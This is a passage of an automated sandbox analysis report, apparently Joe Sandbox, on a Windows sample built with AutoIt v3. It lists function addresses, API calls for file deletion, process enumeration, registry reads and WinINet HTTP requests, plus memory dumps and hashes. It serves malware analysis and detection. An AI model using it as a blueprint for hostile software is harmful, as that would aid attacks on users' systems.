                                                                                                                                                                                                                                    • Part of subcall function 00995851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009955D1,?,?,009D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00995871
                                                                                                                                                                                                                                    • Part of subcall function 009FEAB0: GetFileAttributesW.KERNEL32(?,009FD840), ref: 009FEAB1
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 009FDCCB
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 009FDD1B
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 009FDD2C
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009FDD43
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009FDD4C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                                                                                  • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                  • Opcode ID: 6b30127175068668da30ec67b42c26aad836acb6f03fe94e3a090df5a9cc797e
                                                                                                                                                                                                                                  • Instruction ID: 13cdccb532f492803f0a01b82f64a980edebacc90782efee6d6d80e75357fd0f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b30127175068668da30ec67b42c26aad836acb6f03fe94e3a090df5a9cc797e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 483170310093499BC701EB68D9819FFB7EDBE95300F404D6DF5D582191EB25DA0ACB52
                                                                                                                                                                                                                                  Function 00A0D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00A0D97D
                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 00A0D9B4
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,?,?,00A0CC63,00000000), ref: 00A0D9F9
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,00A0CC63,00000000), ref: 00A0DA0D
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,00A0CC63,00000000), ref: 00A0DA37
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3191363074-0
                                                                                                                                                                                                                                  • Opcode ID: 3115e0679b6787efbc93cb33df4900ec5190be8c7f4e2d76aad55397e1b17d43
                                                                                                                                                                                                                                  • Instruction ID: 9b5476cf23cbabe8444e2bb87fc1a64e68ca177cebc3956fedfcd8dc310ddfa9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3115e0679b6787efbc93cb33df4900ec5190be8c7f4e2d76aad55397e1b17d43
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4313E72604209EFDB24DFE9E885AABB7F8EF44394B10442EE546D3591D730EE41DB60
                                                                                                                                                                                                                                  Function 009FDD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 009FDDAC
                                                                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 009FDDBA
                                                                                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 009FDDDA
                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 009FDE87
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3243318325-0
                                                                                                                                                                                                                                  • Opcode ID: a4b3a6481d1be2899e9f784c5cd720ab236d7cae056eeec93b72ea5546eff1ba
                                                                                                                                                                                                                                  • Instruction ID: 3f3925f3f16093b081523fb8dee1807ab36fbba88086a17a6ec91f57ed182f04
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4b3a6481d1be2899e9f784c5cd720ab236d7cae056eeec93b72ea5546eff1ba
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34318F710083049FD710EF54D885BBFBBE8AFD9344F14092DF685871A1DB719A4ACB92
                                                                                                                                                                                                                                  Function 009FE472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,009D46AC), ref: 009FE482
                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 009FE491
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 009FE4A2
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009FE4AE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2695905019-0
                                                                                                                                                                                                                                  • Opcode ID: 2c07e4f5d94f4d0a1b281fb06fb69cf5cffb13e909a3a85c0d9d0cf913b24f25
                                                                                                                                                                                                                                  • Instruction ID: 84293fd6693c03fb4151612f73edd297752402442761e35aa9b6cffc46b53ab2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c07e4f5d94f4d0a1b281fb06fb69cf5cffb13e909a3a85c0d9d0cf913b24f25
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58F0E53041091497D224A7BCAC0D8BB776EAE12336B504719F936C24F0E7789D978795
                                                                                                                                                                                                                                  Function 009B5058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,009B502E,?,00A598D8,0000000C,009B5185,?,00000002,00000000), ref: 009B5079
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,009B502E,?,00A598D8,0000000C,009B5185,?,00000002,00000000), ref: 009B5080
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 009B5092
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                  • Opcode ID: 31c5f8a65a78554cc0ee369a6c43aa723babef366da1822b0da7d49d4f2c6739
                                                                                                                                                                                                                                  • Instruction ID: 6391eb28071f1eec84bab492029364155e99d2e4b39e9daf8550dc9da4141c65
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31c5f8a65a78554cc0ee369a6c43aa723babef366da1822b0da7d49d4f2c6739
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FE0B631401548AFCF21BF98DE09FA83B69EB553A1F128424F8499A562DB35DD53CAC1
                                                                                                                                                                                                                                  Function 00A0CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A0CEF5
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A0CF08
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A0CF1C
                                                                                                                                                                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A0CF35
                                                                                                                                                                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00A0CF78
                                                                                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A0CF8E
                                                                                                                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A0CF99
                                                                                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A0CFC9
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A0D021
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A0D035
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00A0D040
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                  • Opcode ID: 05adce7e9149ca27d39380132093df77e704b7ee48ee5f9e483ffe636f6ef8a9
                                                                                                                                                                                                                                  • Instruction ID: b8a4b794867b9f6dc30580c116f9c136f3aa80681b135678b12d11d48f2ddbfd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05adce7e9149ca27d39380132093df77e704b7ee48ee5f9e483ffe636f6ef8a9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E51BFB1500708BFDB21CFA4DD88ABB7BBCFF08354F004529F94696191D734D906AB60
                                                                                                                                                                                                                                  Function 0099EE56 Relevance: 21.6, APIs: 14, Instructions: 613windowsleeptimeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetInputState.USER32 ref: 0099EF07
                                                                                                                                                                                                                                  • timeGetTime.WINMM ref: 0099F107
                                                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0099F228
                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 0099F27B
                                                                                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 0099F289
                                                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0099F29F
                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 0099F2B1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2189390790-0
                                                                                                                                                                                                                                  • Opcode ID: bd3e200b3474a8ae654dab160ac497578cca4f6ce39eda32da63e0f1e49ec529
                                                                                                                                                                                                                                  • Instruction ID: c1f6e3c1b26ec2c6ca506bf1f6efb64e8bedd0161c4de71d9edec7d92f8de4b4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd3e200b3474a8ae654dab160ac497578cca4f6ce39eda32da63e0f1e49ec529
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5732E030608741EFDB29CF29C855BAAF7E8BF81304F148929E565C7292C775ED85CB82
                                                                                                                                                                                                                                  Function 00993624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00993657
                                                                                                                                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 00993681
                                                                                                                                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00993692
                                                                                                                                                                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 009936AF
                                                                                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009936BF
                                                                                                                                                                                                                                  • LoadIconW.USER32(000000A9), ref: 009936D5
                                                                                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009936E4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                  • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                  • Opcode ID: 7e667cb51cfda7976f944efea8e8a4a5dcea1f153f2bc11a76aa5ab4af60af93
                                                                                                                                                                                                                                  • Instruction ID: 492c367ea4dc2c3940bec6fdcb1296b044dbdb35e97feb4030f2747ebe8c2ec7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e667cb51cfda7976f944efea8e8a4a5dcea1f153f2bc11a76aa5ab4af60af93
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2521C0B2D01718AFDB10DFE8E889BADBBB4FB08710F10412AF611A62A1D7B545468F94
                                                                                                                                                                                                                                  Function 009D09DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 403 9d09db-9d0a0b call 9d07af 406 9d0a0d-9d0a18 call 9bf636 403->406 407 9d0a26-9d0a32 call 9c5594 403->407 412 9d0a1a-9d0a21 call 9bf649 406->412 413 9d0a4b-9d0a94 call 9d071a 407->413 414 9d0a34-9d0a49 call 9bf636 call 9bf649 407->414 423 9d0cfd-9d0d03 412->423 421 9d0a96-9d0a9f 413->421 422 9d0b01-9d0b0a GetFileType 413->422 414->412 426 9d0ad6-9d0afc GetLastError call 9bf613 421->426 427 9d0aa1-9d0aa5 421->427 428 9d0b0c-9d0b3d GetLastError call 9bf613 CloseHandle 422->428 429 9d0b53-9d0b56 422->429 426->412 427->426 432 9d0aa7-9d0ad4 call 9d071a 427->432 428->412 440 9d0b43-9d0b4e call 9bf649 428->440 430 9d0b5f-9d0b65 429->430 431 9d0b58-9d0b5d 429->431 435 9d0b69-9d0bb7 call 9c54dd 430->435 436 9d0b67 430->436 431->435 432->422 432->426 446 9d0bb9-9d0bc5 call 9d092b 435->446 447 9d0bc7-9d0beb call 9d04cd 435->447 436->435 440->412 446->447 454 9d0bef-9d0bf9 call 9c8a2e 446->454 452 9d0bed 447->452 453 9d0bfe-9d0c41 447->453 452->454 456 9d0c43-9d0c47 453->456 457 9d0c62-9d0c70 453->457 454->423 456->457 459 9d0c49-9d0c5d 456->459 460 9d0cfb 457->460 461 9d0c76-9d0c7a 457->461 459->457 460->423 461->460 462 9d0c7c-9d0caf CloseHandle call 9d071a 461->462 465 9d0cb1-9d0cdd GetLastError call 9bf613 call 9c56a6 462->465 466 9d0ce3-9d0cf7 462->466 465->466 466->460
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009D071A: CreateFileW.KERNEL32(00000000,00000000,?,009D0A84,?,?,00000000,?,009D0A84,00000000,0000000C), ref: 009D0737
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 009D0AEF
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 009D0AF6
                                                                                                                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 009D0B02
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 009D0B0C
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 009D0B15
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009D0B35
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 009D0C7F
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 009D0CB1
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 009D0CB8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                  • Opcode ID: 2417c873971b6b4477a5baccf94dc0f322ae1783ccb07646c2b2a1ecf34bc1c1
                                                                                                                                                                                                                                  • Instruction ID: e4a50b962a0a33c7e93bc9dab393f4d170886ae350b30645263597a6363646a0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2417c873971b6b4477a5baccf94dc0f322ae1783ccb07646c2b2a1ecf34bc1c1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9A13232A541089FCF18EFB8DC52BAE3BA4AB86320F14415EF8119F3A1D7359913CB52
                                                                                                                                                                                                                                  Function 009952A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00995594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,009D4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 009955B2
                                                                                                                                                                                                                                    • Part of subcall function 00995238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0099525A
                                                                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 009953C4
                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009D4BFD
                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009D4C3E
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 009D4C80
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009D4CE7
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009D4CF6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                  • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                  • Opcode ID: 408527733016d8cd9aa75cd6114c3d0dd0715c281173cf3bfdb2dbe02a5cb200
                                                                                                                                                                                                                                  • Instruction ID: 81a04f87a6beb5cf9e7495ce28cb210a51d66a979a73a2aae51dce29cc2a1305
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 408527733016d8cd9aa75cd6114c3d0dd0715c281173cf3bfdb2dbe02a5cb200
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9771A1725053009FCB04EFA9EC45AABBBF8FF94750F40442EF545872A1DBB19A4ACB51
                                                                                                                                                                                                                                  Function 009934D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
